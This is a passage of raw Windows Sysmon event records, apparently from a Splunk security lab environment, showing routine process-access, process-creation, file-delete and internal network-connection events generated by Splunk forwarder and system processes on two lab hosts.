10341000x8000000000000000287612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:02.101{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:02.101{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-115A-6216-0605-000000003802}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:02.101{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-115A-6216-0605-000000003802}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:02.102{C8EA50B7-115A-6216-0605-000000003802}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216550Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:03.129{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D90E49A0FD96C688CF6DD96B7704AD5,SHA256=D7E71A5141A53945905DA56E0EF5743A2226BC33F6375FA52271D01888F8316A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:03.195{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B3FEC415E42700609BFD6EA304056B8,SHA256=91E8BA328F995F44B10823AD85D65DC06ED6AD4D0C89B251651140CFDE1854F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216551Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:04.364{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ED0DBA6B413CFD11A06F33AD466070D,SHA256=E8DECA50D83E48D696615AC210F80CD9ADEB6B21AFA6BBC815747FCFA69E94B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:04.226{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0BE26334A0794F264425D96410D2AA6,SHA256=EF7E3EF1CBCABBE1360DA571FF7C9BB9631A053B9CD015D07BA1BB55EA9C4765,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:04.148{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-115C-6216-0705-000000003802}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:04.148{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:04.148{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:04.148{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-115C-6216-0705-000000003802}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:04.148{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:04.148{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:04.148{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-115C-6216-0705-000000003802}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:04.148{C8EA50B7-115C-6216-0705-000000003802}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216552Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:05.426{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FD491C48D51E76F10BC4050CA6C4439,SHA256=9E35C2F6C96B54C08D25DE8B4FCE7C9BFD01D8E93B508B036E0B7286A1F289AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:05.273{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=290C7CD751B760AA58ED2E1F09DBC125,SHA256=B9008F76A8333BED47A29A12DEDBFF2FF42BB013872634DF8A4DB76413AB0EA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:03.184{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53432-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000287629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:03.184{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53432-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000287628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:02.668{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53431-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216553Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:06.504{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=061D1338B0A5808CC84A17DB1F54616D,SHA256=819BA3DCC5D29ADA55209646F3F998CE9C804BE029675C9F5C82BCE1554703BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:06.288{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BEAC3A515696DE35ADAA705EAEE0BA0,SHA256=A580D8CC2408242525B0E93D2A847A5FE3DC2673F815E8EBD6DD25D8B3F70864,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216554Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:07.645{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7755C22B894D0A1582BBE805DDDABABA,SHA256=6A5F36AEA4DFD16728F415DBE07356568BD9CEB0A17784D6D1EDC119962BC046,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:07.320{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCB4F44ADDEF82C53DCB97BFFE40C2BC,SHA256=4B0761984AB9060206E0E58B1B1F763FA73D6E82B307925790DF4CABDF0FFF03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216556Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:08.879{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62B6BFE3480EB951AA6FE013B32DB16C,SHA256=1238C1875E1E18401FBBF877A4B7B8C3C51CE64B539FE38DBB752F5FEC7994DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:08.335{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9BEA651E58A80BF08A4E258926553FE,SHA256=7146DC1909BE405C023D864AAB9A907263913D8886765E08791C7F2401D284A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216555Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:05.634{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51333-false10.0.1.12-8000- 23542300x8000000000000000287635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:09.366{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B9B1AD8DC042089019631D5A8F78D6B,SHA256=515D519CC538AFC73D538F69964E34CEBB3FDAE2A7EE3D3D5146EC3CA6427BEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:10.366{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8336524B951C437755D2F4824AA3F181,SHA256=DB2929F17F9217E27468FC6388A51DCA9FD60AF09C0D93EB5D42A3CA3C797D89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216557Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:10.067{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE1DD498D377C0A9676473359F888141,SHA256=65A062ED1C174BF727BADA0AD11C12D329349DD27E34FFDCD74A102C68C5D3BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:10.038{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000287639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:08.558{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53433-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:11.413{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D690FDF123AD61CDBCDE75274A25DF9D,SHA256=627EDC972A5235BC9E67D8DBDAF7ABC48E41B951600B3EAE2B43DCB27F7E26BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216558Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:11.270{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1167AC04CF31A98A1CB3ACB0CA28F70,SHA256=2250EA599FD350920F3BCF44EDF8E307C6DCE5DB70646087C87C119E6686C74A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216559Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:12.301{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7095FA545A7AD9FE404A33B2DE8795F,SHA256=D15374E0BFD88C9937A8976179979E96BA4A2818E782CFBA360089596357328D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:12.491{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5667CE93651685EE8FDAF28CB9835D4E,SHA256=96541043836FE404793B0BFAC772AAC438AE1FC1B7CD0813BDAE1DBFC351C0B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:13.538{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55F0A8BA5585EAE52FE4755B399D130A,SHA256=A4DDC942E0FEA803A7B85BBEAB94D69235675D0FB63C538231C0595124D7F354,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216561Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:11.477{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51334-false10.0.1.12-8000- 23542300x8000000000000000216560Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:13.317{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0570CB0D8542C9E28A921A1D5EA7FACF,SHA256=99F639AA644A35225A5A97AC24A700754D04D9AF8DCA198A8A545B8CCF7181DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:14.585{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 